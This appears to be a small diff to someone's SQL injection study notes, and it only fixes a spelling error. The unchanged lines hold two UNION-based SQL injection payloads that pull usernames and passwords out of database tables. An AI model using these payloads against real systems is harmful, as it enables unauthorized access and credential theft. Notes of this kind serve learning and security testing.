badrouarafana/HackingNotes/SQLi/notes.md

 	UNION SELECT username, 2, 3, 4 from passwords-- '

-Retreiving multiple values within the same column we can use contact depending on the sql syntax
+Retrieving multiple values within the same column we can use contact depending on the sql syntax

 	' UNION SELECT username || '~' || password FROM users--